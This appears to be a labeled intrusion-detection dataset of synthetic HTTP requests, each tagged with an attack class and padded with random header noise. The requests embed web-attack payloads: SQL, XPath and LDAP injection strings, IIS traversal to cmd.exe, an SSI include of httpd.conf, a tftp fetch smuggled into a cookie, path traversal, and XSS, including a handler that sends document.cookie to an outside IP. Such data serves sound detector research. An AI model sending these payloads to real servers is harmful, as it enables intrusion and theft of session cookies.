GET /nU0p2mTU/tzntna/eGL4KQJWZNUvP/nSDHTbXozkw5TQ7kki/ggrIJu/jGVo/at_fr/wDK@rn.htm?jezNrnsta=7&teutdtn=%27+++group+++++by++users.id+++having+++++931%3D931&eanssnrewroeG=stiaiCldcomP&cSDeghf1lm=arscNxshiierkel&majSt=shdhshutdownsivlad&Fnsyn=191513&oosrdhs6aysSe=371&fr=os+s&JPV7gb=+Lqit&1f5oO=343&ysdzt2eanhu=iaSn%27Titklhqijsumocha&xtucgrwn=nc%3Cbu HTTP/1.1
Host: 53.217.23.167
Connection: ex0ntpa1
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: th0c9avb-es77oLt;q=0.6, ekle-Iseste;q=0.2
Client-ip: 186.49.71.187
Cookie2: $Version="1"
Date: Fri, 28 Mar 08 15:48:36 UTC
ETag: W/"5KIIbf4_n@3BfW.2kH"
Expect: uppra=siwsae;l5hebut
From: tehAicae@isHota.com
If-Modified-Since: Fri, 25 May 07 21:31:10 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
Referer: http://iomiaa.st/7qtosEw/rondfoi2/6nsr.css
TE: gzip,trailers
User-Agent: ote9ee (r9d1t@TxK2; eZzuatL2; oS50zojK; h_TIRiOi)
UA-CPU: Sparc
UA-Disp: 478,8453,32
Transfer-Encoding: compress
----: -----------

null

End - Id: 42597
Start - Id: 44631
class: OsCommanding
POST /aQ9YQltZ/anifaipsaOeftad2iZyf/oesAot/hehah6k/Dd_./Mmi/kEfM5U/1HXksposition.jpg? HTTP/1.1
Content-Length: 129
Content-Language: xe,e2
Content-Encoding: gzip
Content-Location: http://www.ssfenrkr.fr/pcrnn.mp3
Content-MD5: b2Fybzdyc2lCdWNoZG5vcw==
Content-Type: application/x-www-form-urlencoded
Host: 199.208.230.94:307
Connection: keep-alive
Accept: image/*;q=0.1, video/*, text/plain
Accept-Charset: x-mac-chinesesimp, ks_c_5601-1987;q=0.1
Accept-Encoding: gzip;q=0.9, gzip;q=0.3, compress;q=0.1
Cache-Control: max-age=41
Cookie: snauhdqztaagso=ut7yetaureapaeljl;iivEefeSaa=3.60.206.101  | tftp 192.168.10.33 evil.txt;access_logvkvIU=s is
Cookie2: $Version="092"
Date: Wed, 04 Jan 06 05:21:01 CET
Expect: 100-continue
If-Modified-Since: Wed, 22 Jun 05 15:01:11 UTC
If-Unmodified-Since: Mon, 30 Nov 09 24:53:37 UTC
If-Range: "ukf-zND9H.@y5TV"
Max-Forwards: 0
Referer: http://9lsh.cz/nehilt/ewqebI/ugsnO.jsp
User-Agent: Mozilla/2.8 (Machintosh; U; Mac OS X 9.7; 08-3s; rv:6.8.2) Gecko/32379199
Transfer-Encoding: identity
Upgrade: wntf/9.9

eph0ea=Bi&oasa=oruae&oleM=6190968&e4FGsP=i@7sddR&N5MEfrom9v5HD=e?opt&ntonx=eiusame&p7whh56setty=oi8aee&erg=|fio0catafoahttp

End - Id: 44631
Start - Id: 35589
class: XPathInjection
GET /iaf/2jm4dtiFi@t/replaceHT.ukQfk/@Q41-b5/79etto/fGm_50r9TnHv7V5n4Q/lSzIdM/za2bcFuWtG9VAF7h/jf8Ze4ir7ByJ0y/rTwTqgs0NkGGVkDcl/i2actdeosheef.shtml?avcwomateastmy7=8kd%27+or+++1%3C+++d0ssi%2Fl%2FE1ta%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D556%5D+++or+++++%27lhrcmo%27+%3D%27&R9uV=%3Fttatvbscriptb&nieimBohns=rD-kNO HTTP/1.0
Host: www.s8alia.de
Connection: close
Accept: */*;q=0.0
Accept-Charset: euc-cn
Accept-Encoding: compress;q=0.0, compress;q=0.0, compress, deflate;q=0.5
Accept-Language: g-sB, gsuTanvJ-nfpo, ms2ato-ug;q=0.2
Cache-Control: no-transform
Client-ip: 146.199.243.126
Cookie: oreeinzeto4r8e=eoytn;gthmeep=ptdsId;triSOciurzkett=o-OJqtDGNqA;nhuqx=0;9rteazee=tf-J.i5fA;uvVqmc=Ose
Cookie2: $Version="8"
Date: Sun, 27 Apr 08 18:16:42 CET
ETag: W/"hI@P2lhb.9ij7_jV"
Expect: stHs
From: keef8S@qicoiNe.be
If-Modified-Since: Sat, 24 Jun 06 20:37:15 UTC
If-Unmodified-Since: Mon, 17 Sep 07 22:15:32 UTC
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: "ROUscR3pkmOD.leDa"
If-Range: Mon, 17 Dec 07 24:03:19 GMT
Max-Forwards: 2660
MIME-Version: 4.7
Pragma: 5e=shda
Proxy-Authorization: NTLM aWFlZHB1b2dlbTFlNHoydWFhcmNvb3dhcmVtY2xmMWdmczB0ZWxuZWZwb2Y=
Authorization: Basic bnNmc2k6MnAzYWM=
Range: 1278-6
Referer: http://www.EwGheee.be/teLron/6jRwgn/ozqe7O.wmn
TE: chunked;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/8.9 (compatible; MSIE 8.5; Windows NT; oiup; 0eAs; Iyra)
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 468x391
Via: FTP/0.9 211.51.240.176, HTTP/9.8 5.202.57.232, 3.5 128.216.105.127
Transfer-Encoding: compress
Upgrade: anfbe/0.9, m2ntt/2.0
Warning: 204 197.17.40.24 "eS4aShneveaeoeqAni" "Sun, 06 Nov 05 19:18:19 CET"
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 65275952070459353
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35589
Start - Id: 43790
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.geuhq66.st
Connection: close
Accept: image/png;q=0.7, application/*, audio/*
Accept-Charset: shift_jis;q=0.5, windows-1258;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=34
Client-ip: 96.0.65.19
Cookie: bgin7im=asl"apacsdrop"atO/ 
Cookie2: $Version="730"
Date: Sun, 28 Mar 10 18:35:06 CET
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: eOrde=mEgiaao
From: qto7read@r8owxth.de
If-Modified-Since: Sun, 30 Mar 08 11:56:33 UTC
If-Unmodified-Since: Thu, 02 Apr 09 24:12:52 CET
If-Match: *
If-None-Match: "X0vDchMuUzzbLnZ"
If-Range: Thu, 28 Apr 05 19:22:49 CET
Max-Forwards: 6908
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: pTeest obeyj=ge1a
Range: 904036-,02113-35,44499-
Referer: /h3agrie/lc9rdndr.wav
TE: trailers,trailers,deflate;q=0.9
Trailer: Pragma
User-Agent: raend0tse (ssKCUYS; a@ejDWzF)
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 697x813
Via: FTP/7.1 www.sh0d1g.htm, Essss/1.4 www.c1Ribwb.html
Transfer-Encoding: deflate
Upgrade: hhe/3.7, 3otn/0.5
Warning: 460 www.n9Mes.jpeg:02263 "Eetoalsmogtatnc" 
X-Forwarded-For: 203.135.237.55
X-Serial-Number: 055444693738
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43790
Start - Id: 39555
class: SSI
PUT /1vDbakv930h1.mspx? HTTP/1.0
Content-Length: 92
Content-Language: od6REey
Content-Encoding: compress
Content-Location: /apuh/eoalhs/47aaor6c/Sto5slst.jpg
Content-MD5: bjEyZWN1YW1paG5meXRpZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Aug 05 16:48:36 CET
Last-Modified: Fri, 24 Nov 06 06:08:03 UTC
Host: www.Hrhnu8hH.net
Connection: close
Accept: text/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=6
Client-ip: 147.32.196.230
Cookie: diaiicCooboa=1HlT9P;ld=sN.;outr7rAa=9NstrLnn;ftt8ietaitOn=60;Ooos8=7Btmntreao;ec=CiEgerwithi
Cookie2: $Version="99"
Date: Mon, 07 Jan 08 07:36:52 GMT
ETag: "jH5nNBEG4Q3ydGqFcPDi"
Expect: 100-continue
From: resjr@ovdSf3ie7i.biz
If-Modified-Since: Sat, 30 Jul 05 21:35:58 UTC
If-Unmodified-Since: Sun, 10 Jul 05 16:59:49 GMT
If-Match: *
If-None-Match: *
If-Range: "m3d43XpygTRLM7o.v"
Max-Forwards: 549
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM ZjJzNWlueDhhY29hdHBvZ2VvZWZwcmlyb2ljdDdidm55YXR5eTJpRWV4YWpTZXA=
Authorization: Basic ZWk4bmFmbnk6c3JybHRz
Referer: http://www.doncr1ma.de/oEtoper/ua8re8aa.shtml
TE: trailers,gzip;q=0.3,deflate;q=0.5
Trailer: Accept-Encoding
User-Agent: Mozilla/9.3 (Machintosh; U; PPC 0.4; ss-er; rv:8.5.1) Gecko/07683868
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color8
Via: 9.2 101.249.175.32, 0.8 www.ruOivEa.css
Transfer-Encoding: identity
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 138 www.mUgeeihd.jpeg "rr0mHnay7tiSwEpan" "Thu, 22 Mar 07 10:16:04 GMT"
X-Serial-Number: 11507528452920010282
----: -----------------------------
~~~~~: ~~~~~~~~~~~

frSurb2htihuiEa=<!--#include     virtual="/etc/httpd/httpd.conf"     -->

End - Id: 39555
Start - Id: 46708
class: XSS
GET /we6pnmdiiflabs0it/i@5p/oris/r0PPY/tsj/eavoasHmweecOmedEY/VYlikeipf.q5.css?seeNcnE=68286000&reaoButeXo9er=8aa9ieese&5ercSw=iwm&w8rMwdomn=119&llaeeb6iurot=re&CK6object2cbql=73726&H2s6tAdshrold=6&rbwspg=einput&wrieUjl2t1aa=6&xwmeer=qntralznetm HTTP/1.1
Host: 238.134.204.34
Connection: keep-alive
Accept: application/rtf;q=0.6, text/*;q=0.5, text/*
Accept-Charset: windows-1252;q=0.1
Accept-Encoding: 
Accept-Language: bstaeeoN-dlrtdo, aan-3eQr;q=0.0, eiE8oi-keeln, jchs-9cllGIi6
Cache-Control: no-transform
Client-ip: 176.138.34.34
Cookie: sahywnlsdu1l=upee1nw9oigqn;bdGjKi0=<div     onmouseover= "   [window.open('http://39.238.171.221/is.asp'+document.cookie);]"   >;wbois=H p>+iie=ds86Er&waxp_h
Date: Tue, 20 Jan 04 09:43:11 UTC
If-Unmodified-Since: Tue, 20 Mar 07 04:18:38 UTC
If-Match: "yZv.n2PaVt-PD9nx-vZ"
If-None-Match: *
If-Range: *
Max-Forwards: 232
MIME-Version: 6.9
Pragma: 4tpknb=torl
Authorization: NTLM OGlhb3N1Y3Rtc3JwaXJ1dWNjcHNsZ3dvZnJ2bEJjYnNldXRPblpybVRMZTM4bWc=
Referer: http://www.2tysegN.ch/e7f1/b8lnr8e/hewnmE/eolbu.mspx
TE: gzip,trailers
User-Agent: Mozilla/8.1 (X11; U; Unix 5.9; re-n7; rv:9.1.8) Gecko/53620873
UA-Disp: 2459,269,16
UA-Pixels: 461x6638
Upgrade: dnn8n/8.5, uwgd/4.4, rph/8.4
X-Forwarded-For: 40.45.63.28
----: ------------------------------------------------

null

End - Id: 46708
Start - Id: 36580
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.tsnykanhe3.net
Connection: keep-alive
Accept: application/*, image/gif;q=0.6, text/*
Accept-Charset: euc-kr;q=0.8, cp-932;q=0.2
Accept-Encoding: deflate;q=0.2, gzip, deflate, identity, identity
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 252.39.154.149
Cookie: Srqi4rLgu5ioR2t=reszt;Xo7Tn=4;y_j02OlW=8121813970;iei=doSlo;.22N=33355157
Cookie2: $Version="2"
Date: Fri, 05 May 06 12:26:11 CET
ETag: W/"ii87XQjje42GUbBHrDr"
Expect: 100-continue
From: osNAoh@aHn2nry.de
If-Modified-Since: Fri, 06 Aug 04 02:57:58 CET
If-Unmodified-Since: Sun, 02 May 04 18:03:23 UTC
If-Match: "OyiTqp.o2UvPoyP3I"
If-None-Match: *
If-Range: Sun, 22 Jan 06 21:38:58 CET
Max-Forwards: 98
MIME-Version: 3.8
Pragma: na='Fsswaes'
Proxy-Authorization: Digest nonce
Authorization: Basic cnMzcjpsMGVBQTc=
Range: 603-731460,2527-,65-
Referer: http://tPtboau.biz/Eaeenmw/sz5L1ih/mmssME9e.pl
TE: trailers,deflate
Trailer: If-Modified-Since
User-Agent: tIrriK4RY http://www.r4iT.cz
UA-CPU: PowerPC
UA-Disp: 380,5893,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 9.3 www.pghfza.png
Transfer-Encoding: identity
Upgrade: oahg/6.4, 3ju/1.3, e2t/8.6
Warning: 353 98.201.134.39 "fe2bemhte" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 8032084316017934872
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36580
Start - Id: 36605
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.sbsE8martn.st:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: ks_c_5601-1987;q=0.7, x-mac-ce, big5;q=0.5, iso-8859-5;q=0.8, cp-950
Accept-Encoding: compress, identity, compress, deflate;q=0.4, compress;q=0.4
Accept-Language: eeint2-i, gbuaex-n, odrs-3ni, ifi-ma;q=0.9
Cache-Control: only-if-cached
Client-ip: 34.3.142.249
Cookie: iaBoetld=g:r/t;senbh=60176188;e2nle=hsde6 ] @n@6h0d?m8l
Cookie2: $Version="9"
Date: Tue, 15 Apr 08 09:30:02 UTC
ETag: W/"1_KXAyMq@l--DHPBl9"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Thu, 29 Sep 05 18:53:19 UTC
If-Unmodified-Since: Mon, 08 Feb 10 10:00:09 CET
If-Match: *
If-None-Match: "y3-OKVTeDdF14ozbiQ9"
If-Range: Tue, 04 Apr 06 01:21:17 GMT
Max-Forwards: 61
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: NTLM ZXR3YXNsbHI1cnlibElpYWVocTVLdzNzb2FsbG11dXNjcnY=
Range: 6-,-601,-000578
Referer: http://www.ynynmbb.be/I25bq9/ueIiBe/6yseefgm/niefhm.html
TE: deflate;q=0.7,trailers,trailers
Trailer: Max-Forwards
User-Agent: et6t/8.1.0.8.6
UA-CPU: MIPS
UA-Disp: 1925,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: HTTP/3.7 239.148.29.218, asbpsz/5.7 www.pl3ug7oe.png, HTTP/0.1 www.tgecc.html:3
Transfer-Encoding: identity
Upgrade: uof/2.1, pIto/5.6, Weac/8.2, o0shyf/1.7
Warning: 079 www.hmte9ks.gif "bsnlaehuereei" 
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 0686987
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36605
Start - Id: 38441
class: LdapInjection
GET /vTes49jq_6.shtml?eX8x4t93phpDA_=votswkzgtaodsns&x47l5SzbcR7=861730644&BusrYAgcJP4-x7=Ehd&8Von=p8q-CrtZvZQ5&etpdeE=harntseelteh&8lkaiec=799289&Tt0cfm7lennndll=47&4nXpww1ethr=lrapXhvprocessing-instructionnetcatatetcoechoEy&aeQGdlneeoRl0p=%29%28++++%7C++%28++++cn%3D*o%27brien*%29%28mail%3D*o++%27brien*++++%29+++&1h=%2FlylsnOnds&tszlnmoy7ewssp=lKp1sW_cPT HTTP/1.1
Host: 242.225.42.148:80
Connection: close
Accept: text/*, video/quicktime;q=0.7, audio/*
Accept-Charset: us-ascii;q=0.1, windows-1255;q=0.5, x-mac-icelandic, windows-1252;q=0.3
Accept-Encoding: *
Accept-Language: au-I2ahi;q=0.8, 3-ei;q=0.1
Cache-Control: max-stale
Client-ip: 19.133.31.135
Cookie: c2id=2i1oa
Cookie2: $Version="1"
Date: Mon, 13 Nov 06 06:44:40 GMT
ETag: W/"BpcspexLKViXdbtMsF0W"
Expect: dhhyijas=mxidodg
From: rrdhloR@le2p.gov
If-Modified-Since: Mon, 09 Feb 09 05:06:26 GMT
If-Unmodified-Since: Thu, 05 Feb 04 05:33:56 CET
If-Match: "lYDjuaJTlLKJXd0A47"
If-None-Match: *
If-Range: Thu, 10 May 07 12:25:04 UTC
Max-Forwards: 6
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: NTLM ZWlIYUJvZnJpb2VuZGVFbWFpYW1sMXJkaWRzeXVscjE=
Range: 722-
Referer: http://www.ldTtS.it/conll/iIa4hhm.exe
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/9.9 (compatible; Konqueror/2.9; Win98; hmkbb; 4eeOha; D3si4hxs)
UA-CPU: 68000
UA-Disp: 664,920,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 040x944
Via: 7.8 16.254.235.238:89, 1.1 www.rooeTLr.css:678
Transfer-Encoding: compress
Upgrade: tunet/0.9, arant/2.6, wts/9.0, gdp/6.1
Warning: 002 214.157.156.89:632 "8yEitwPEhweiynae" "Mon, 24 Nov 08 09:49:08 CET"
X-Forwarded-For: 62.19.165.119
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38441
Start - Id: 46625
class: XSS
GET /d6oempmh6efrs8hpe/e_PSE/4Yb/cZc2jJI/n_GY2r./phtd/ioyrif3s71to5hznizga/n.NhAl_CBuPy2/ohaEAookr.shtml?eps5ht=dxgBS&Its=rani HTTP/1.1
Host: 80.213.44.22:80
Connection: bheers
Accept: */*
Accept-Charset: iso-8859-8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 39.248.50.130
Cookie: eeh8Iehc=04;oreretbhsrs=np3c;CKoFrpXX3netcatall=49;oqcuuwlTQligtm=7924
Cookie2: $Version="9"
Date: Sun, 22 Feb 04 03:26:28 CET
ETag: "H0IWPaA00YFhFGDyq"
If-Modified-Since: Mon, 12 Dec 05 02:31:07 UTC
If-Unmodified-Since: Fri, 15 Jan 10 09:41:14 UTC
If-None-Match: "xKH-WAALjNlvfIOToW"
If-Range: Wed, 18 Apr 07 22:31:32 CET
Max-Forwards: 174
Pragma: anR=nde2tn
Proxy-Authorization: NTLM c2hkbDNhbmRhMGVJbGluUmN3MW9zM2VlbFdleHFpZWhBbmFzaURmOW1tZG8xeg==
Authorization: NTLM c25oYmF3dHNtZG9zeXJvMEZBdWV3ZWNlbG8zYWcwTXNzYXltQW00OWhoMGg=
Referer: http://holSw.fr/enolE/yaieows/euet.mp3
TE: trailers,trailers
User-Agent: <script  >alert(   "    0nk.laGun")</script    >
UA-Pixels: 5419x0635
Via: 5.1 80.173.10.202, HTTP/8.7 223.146.174.50, 0.4 246.38.189.215
Transfer-Encoding: gzip
Upgrade: Ecza/9.5

null

End - Id: 46625
Start - Id: 49224
class: XPathInjection
GET /LL3httpsaogbftp/svxd7WZK/stInpdmei/o-99HboqwhhJGHp/havingsm9MCy7NAx@wCf/ejH-9LcjNw0./Tjobh4perl3ebTQ/dnLLZ.htm?q-F4PE=%24rTlinserte+omisz&Dnhs=d%2Biie+n&Incerqzygci1t=iit&6ly3tiSrr9ae=s1Iz5NUyc&RrnndSaparanNxa=nnyIB&eercaHuighh=74497&a1tix=ezear&ss=owcoln%27++++or++++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i+%2B++++j+%2Bk%2B+l+++%2B++1%29%5D+++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++++%27dfeiea%27+%3D++++%27+++++e6aryn%27+++++or HTTP/1.0
Host: www.rogdETd.de
Connection: close
Accept: application/x-tar;q=0.1, video/quicktime, audio/basic
Accept-Charset: cp-936, iso-8859-2, iso-10646-ucs-2, euc-cn;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: aF-eidi;q=0.9, hppgtR-wv
Cache-Control: max-age=7464
Client-ip: 22.111.61.54
Cookie: oonEjnU=hhtpasseoeezwre;jNdexdotUzr=267656461
Cookie2: $Version="56"
Date: Mon, 15 Sep 08 09:48:32 CET
ETag: W/"wqiL1g8LNgzIAAzcyrE"
Expect: tdtiTg
From: 92fxf@rrjet00.biz
If-Modified-Since: Fri, 19 Jun 09 06:34:04 CET
If-Unmodified-Since: Fri, 05 Nov 04 05:50:46 CET
If-Match: "@yp7--orXcGeBrzj."
If-None-Match: "ijD3huhYH@y69I79kC"
If-Range: *
Max-Forwards: 9
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM c29kbmNua2V1d3RmemV3aGVudHJlYTFhdG8ycmVobmRzcmU2c3JlcHJpamhvOGU=
Range: 43152-,41540-0,9210-
Referer: /cermldrv/awhompr.mp3
TE: deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/6.1 (Windows; U; Windows NT 1.7; ia-in; rv:3.9.2) Gecko/02483158
UA-CPU: StrongARM
UA-Disp: 2354,727,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 353x220
Via: FTP/0.6 214.203.107.215:9379, FTP/6.4 www.hha6.jpg:546
Transfer-Encoding: deflate
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 502 253.96.14.29 "teeatydficcCyrvtey" "Thu, 06 Mar 08 12:20:53 GMT"
X-Forwarded-For: 104.165.218.9
X-Serial-Number: 312383203635
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49224
Start - Id: 39474
class: SSI
POST /pktnnotnrtNrihrne/9QKA/bxwMCO/lwDhTf0l/th/q0BlFjG.js? HTTP/1.1
Content-Length: 171
Content-Language: xeui,fepbs,trresu
Content-Encoding: gzip
Content-Location: /Inlo/aetmR.swf
Content-MD5: dDZpd1RkYW5vZWRwbXVlcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 06 Apr 05 17:38:33 CET
Last-Modified: Sun, 17 Feb 08 17:20:14 UTC
Host: 249.62.189.225:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: <!--#echo var="date_gmt"-->
Accept-Language: *;q=0.7
Cache-Control: max-age=59
Client-ip: 81.231.57.32
Cookie: nccnaotwltlp1s=39414;oO=3;ctolIaa=Sh)cfroma;arnyozetnv=tit64hd664to;am=si8tdi7;hCSallVl5ol8d=img 
Cookie2: $Version="806"
Date: Mon, 07 Aug 06 12:49:24 CET
ETag: "-pMwXMm-ubda_noYXj"
Expect: Efvkeonb=egfred
From: vremoht@ieaoEytq.org
If-Modified-Since: Tue, 10 Jun 08 03:43:18 GMT
If-Unmodified-Since: Fri, 25 Nov 05 12:14:41 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 04 May 06 07:53:45 GMT
Max-Forwards: 5
Pragma: no-cache
Proxy-Authorization: NTLM c3JuaGxyRWR4b3R1aWh0cmFnd2FlYXQxVGRudG9yb3llZGxFc21vZGo2cA==
Authorization: lgnId auko43=Swctiz
Range: 7116-024
Referer: /3tudtu/1je1odmi/eik4VeHN.bin
TE: trailers,trailers
User-Agent: nudur1/9.0.0
UA-CPU: Sparc
UA-Pixels: 8114x0121
Via: 2.2 157.138.84.63, 0.7 152.187.75.57, FTP/5.0 www.EelU.png
X-Forwarded-For: 255.162.171.217
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tf8oudhvtu=tbopt&pnrtiwl=d0&aieyleil8uN=ioB-mipH@Sg&tehmr=9pdiio&Boptl079e=m\aaGiombin~&ststeetgsx=rvJsUulm4juJ&I@Snph-Q=tpsas0&ftpuYMBlocation8perlRy=tNr6q&Etmm=oEr

End - Id: 39474
Start - Id: 36198
class: PathTransversal
PUT /n-qHuejcrdGCvdEZ/tteaUdefEnet/noarcdna2ta2pmtdwlt/eTm/Htr.php3? HTTP/1.1
Content-Length: 210
Content-Language: aleohr
Content-Encoding: compress
Content-Location: http://www.zbmcnfa.uk/agorexc/koole.jsp
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Nov 05 12:12:44 CET
Last-Modified: Sat, 19 Sep 09 23:45:07 UTC
Host: 224.176.96.118:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: euc-tw;q=0.3, cp-932
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 137.251.147.160
Cookie: sEj5ito=oA2iBj98;stEaejehse=../../../../../../WINDOWS/autoexec.bat;6a1i4Lt=oZE8;bm=saenialyraccess_log;ihoe0Yjeiovon=4023;YgMrxghttp=\ZaendNdshH1
Cookie2: $Version="151"
Date: Tue, 14 Aug 07 22:08:57 UTC
ETag: "bcvM9.5IQA7pv3@b@25D"
Expect: v5Atem=FhtLGw;ne8tOw9=asd4f
If-Unmodified-Since: Sat, 28 Feb 04 17:02:52 CET
If-Match: *
If-Range: "1Gb_Myxa3KG4llozHfQ"
Max-Forwards: 636
Pragma: We='mcaeis'
Referer: http://www.rnclmi.st/evphsa/sihzts3/7Cc7s.php3
TE: chunked,trailers,chunked
Trailer: Accept
User-Agent: pkoodjt3avEeFoicrh3
UA-Color: color16
Via: uitts/5.6 203.113.25.153:9226, FTP/9.4 212.180.184.215, HTTP/6.5 202.121.16.114
Transfer-Encoding: deflate
Upgrade: g9bs/5.5, webao/5.8, tes/8.0
Warning: 217 43.192.67.232:14605 "dtudcegfnatmcnuper" 

2htYimdjooii=07196766&ilikeh=38342&loteytji8en=Ie1tshdvoaha&6n=ixuq9Bt&ropbtnu9aa=e8t@&Eardeejecelhi=9210&6ome=etoedi55o&xeaundafesci8kg=7fDZm4l&ketiirse=3&4lmslhanbq=37547&yws=oo6lnhoSUa1uses&fmri4dsqce=t<

End - Id: 36198
Start - Id: 48750
class: XPathInjection
GET /isahieiwde/mtOMjQk7YRa/KIFnVF_Cexec_EFO/nkYdneihre/ililyhFEts2hth4ta6t/s7/horr/iRzVC-g1yV-F6UI5.cgi?NosmBKrllcby4=rS6yhisI&hse=rm%5C9&thtdateve8ntcs=recho&txl5blsssTl=9819&emse=oeyhRd%27++++or+++%28i+%3C+count%28the0d%2Fchild%3A%3Atext%28%29%29+++++and+++++j+++%3C++count%28so%2Fchild%3A%3Acomment%28%29%29+and+++++k+%3C+++count%28hmke%2Fchild%3A%3A*%29++%29+++++or++%27aoescyE%27++++%3D++%27+++ntri%27+++or&cabghce=hleaa HTTP/1.0
Host: 106.201.94.62
Connection: keep-alive
Accept: application/*, audio/basic;q=0.5, audio/*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=45
Client-ip: 137.88.26.232
Cookie: 3YOhupdatesqarLZ=ee texrlSOoHvd;trGr0stdp=eid1
Cookie2: $Version="094"
Date: Thu, 05 Nov 09 05:23:04 UTC
ETag: "ziszZk3WBXeiUD9SNJp"
Expect: 100-continue
From: 2thchRa@mEq7atat.cz
If-Modified-Since: Mon, 17 Jul 06 04:05:22 GMT
If-Unmodified-Since: Thu, 14 Dec 06 11:25:06 UTC
If-Match: *
If-None-Match: "WUzOgpHj@FYohzk"
If-Range: Thu, 14 Oct 04 09:30:35 CET
Max-Forwards: 0
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic TWlpaTozZXdF
Authorization: NTLM dG1sZW1lZUFwdTlpaWlFcnJkYWV6d256ZWVuandpaHNMZW9nbG9lZWhjZG5ybg==
Range: -506333,18704-151605
Referer: http://9ina.be/qztts.jpeg
TE: gzip,gzip;q=0.7,chunked
Trailer: If-Range
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 8.0; it-nu; rv:1.5.0) Gecko/11663018
UA-CPU: MIPS
UA-Disp: 132,229,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0470x877
Via: ntl/9.4 www.4T1g3erb.htm, FTP/0.0 www.tiRJcs.jpg
Transfer-Encoding: compress
Upgrade: asd/1.5, Ttn35k/8.5
Warning: 303 90.249.48.25 "nehmlsj3aoo" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48750
Start - Id: 44782
class: PathTransversal
GET /tbodNteA/l2sriuw.sh?oalae0et6sif=form&Rf0from%u7F=i65kCM&rdzoezn3kfGRw=39982279&nintIer=hejd&eedin=iVe0P-4GZ&iisN=tP5&arnheduCrjs6=4628185&lautoexec3EUv4SG=..%2F..%2F..%2Ftoan%2Fadmin.txt&oeaineidedcah=i8RqU-gU&rF-J0=603&fSietytdZc=tmp++Wu&iE60j.9=19 HTTP/1.1
Host: www.t9seurtd.org:80
Connection: oooieuSd
Accept: */*
Accept-Charset: windows-1250, windows-1258, shift_jis, windows-1257;q=0.2
Accept-Encoding: *
Accept-Language: SlPsaere-h;q=0.4, Feraro3a-bhel6wl;q=0.7, idst-f;q=0.3, tu-g1t;q=0.7, h71tqq-eEsdr;q=0.1
Cache-Control: no-store
Client-ip: 229.119.79.242
